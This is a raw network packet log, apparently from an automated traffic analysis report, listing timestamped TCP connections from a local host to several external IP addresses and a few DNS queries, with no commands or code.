                                                                                                                                                                                                            May 1, 2024 11:08:52.555711985 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555733919 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:52.555737019 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555748940 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555762053 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:52.555767059 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555823088 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:52.555826902 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555836916 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555859089 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:52.555861950 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555870056 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555906057 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:52.555993080 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:52.760118961 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.760180950 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.196109056 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.196165085 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.741209030 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.741238117 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.741250992 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.741327047 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.788079977 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.788089991 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788105011 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788113117 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788181067 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.788187027 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788198948 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788203955 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788289070 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.788294077 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788316965 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788336039 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788434029 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.788439989 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788472891 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.788573980 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.969391108 CEST49747443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.996130943 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.996202946 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.285793066 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:08:54.386287928 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.386364937 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:08:54.387012005 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:08:54.408123016 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.408217907 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.507864952 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.507878065 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.512624025 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:08:54.572567940 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.572587967 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.572604895 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.572649956 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.603238106 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.603255987 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603270054 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603338003 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.603343964 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603355885 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603359938 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603451967 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.603456020 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603470087 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603487968 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603578091 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.603578091 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.603584051 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603676081 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.603730917 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.658020973 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.812120914 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.812170029 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.930636883 CEST49747443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:55.244127035 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:55.246426105 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:56.076111078 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:56.078404903 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.343368053 CEST4975880192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.438055992 CEST8049758172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.438129902 CEST4975880192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.438606024 CEST4975880192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.533143997 CEST8049758172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.592268944 CEST8049758172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.592288017 CEST8049758172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.592503071 CEST4975880192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.592911959 CEST8049758172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.592962027 CEST4975880192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.612436056 CEST4975880192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.613473892 CEST49759443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.613523960 CEST44349759172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.613598108 CEST49759443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.614752054 CEST49759443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.614784002 CEST44349759172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.650686979 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.650706053 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.650718927 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.650774956 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.680381060 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.680397987 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.680411100 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.680488110 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.680495977 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.680509090 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.680512905 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.680613041 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.680619955 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.680639029 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.680655003 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.680737972 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.680742979 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.680751085 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.680788040 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.680795908 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.680907011 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.706975937 CEST8049758172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.812496901 CEST44349759172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.812949896 CEST49759443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.812979937 CEST44349759172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.813894987 CEST44349759172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.813966036 CEST49759443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.816147089 CEST49759443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.816198111 CEST44349759172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.816267967 CEST49759443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.892117977 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.892165899 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:58.316128969 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.316282988 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:58.455622911 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:58.455657005 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.455723047 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:58.493218899 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:58.493251085 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.493267059 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.493336916 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:58.493344069 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.493357897 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.493453026 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:58.493459940 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.493488073 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.493503094 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.493506908 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.493643999 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:58.493649960 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.493683100 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:58.493689060 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.493815899 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:58.571779966 CEST49747443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:58.571779966 CEST49747443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:58.571806908 CEST44349747172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.571815968 CEST44349747172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.700114012 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:58.702428102 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:59.116118908 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:59.116190910 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:59.298527956 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:59.298547983 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:59.298610926 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:59.508127928 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:59.510423899 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:59.948126078 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:59.950432062 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:00.780131102 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.780180931 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:00.804474115 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:00.804507971 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.804521084 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.804570913 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:00.804579020 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.804590940 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.804661036 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:00.804666042 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.804678917 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.804697037 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.804718971 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:00.804722071 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.804749966 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:00.804754019 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.804763079 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.804797888 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:00.804802895 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.804821968 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.804845095 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:00.804847956 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.804860115 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:00.804888010 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:00.804950953 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:01.016130924 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:01.016204119 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:01.452131033 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:01.452192068 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:02.257541895 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:02.257584095 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:02.257601976 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:02.257672071 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:02.304116964 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:02.304151058 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:02.304166079 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:02.304244995 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:02.304251909 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:02.304263115 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:02.304276943 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:02.304307938 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:02.304311991 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:02.304352045 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:02.304358959 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:02.304406881 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:02.304449081 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:03.121709108 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:03.147345066 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:05.180871010 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:05.180906057 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:05.180922985 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:09:05.180928946 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:05.950386047 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:05.950416088 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:05.950475931 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:05.951159000 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:05.951176882 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:06.371634960 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:06.371923923 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:06.373740911 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:06.373749018 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:06.373992920 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:06.385848999 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:06.428121090 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:07.164316893 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:07.164340019 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:07.164366007 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:07.164418936 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:07.164437056 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:07.164458990 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:07.164467096 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:07.164470911 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:07.164499044 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:07.164525032 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:07.170784950 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:07.170804977 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:07.170816898 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:07.170823097 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.104758024 CEST4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                            May 1, 2024 11:09:16.136311054 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:16.136346102 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.136415005 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:16.136636019 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:16.136648893 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.205276966 CEST8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.205312967 CEST8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.205398083 CEST4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                            May 1, 2024 11:09:16.330240965 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.349245071 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:16.349272013 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.349853039 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.397991896 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:17.640144110 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:17.640351057 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:17.686976910 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:25.462770939 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:25.465718985 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:09:25.566354990 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:26.330590963 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:26.330665112 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:26.330812931 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:26.696955919 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:26.696986914 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:54.506772041 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:54.553755999 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:09:54.660118103 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:09:54.708703041 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:09:54.760277987 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:54.760314941 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:54.813564062 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:09:54.850081921 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:10:11.867594004 CEST497576101192.168.2.474.201.73.52

                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            May 1, 2024 11:08:05.659542084 CEST6477053192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:08:05.760641098 CEST53647701.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:11.879626036 CEST53536711.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:12.085637093 CEST53501821.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:12.089757919 CEST5398753192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:08:12.089952946 CEST5184953192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:08:12.184945107 CEST53518491.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:12.184963942 CEST53539871.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:14.358165026 CEST53530851.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:14.530518055 CEST53585091.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:17.800328016 CEST6132353192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:08:17.800791979 CEST5932853192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:08:17.896565914 CEST53593281.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:17.897937059 CEST53613231.1.1.1192.168.2.4
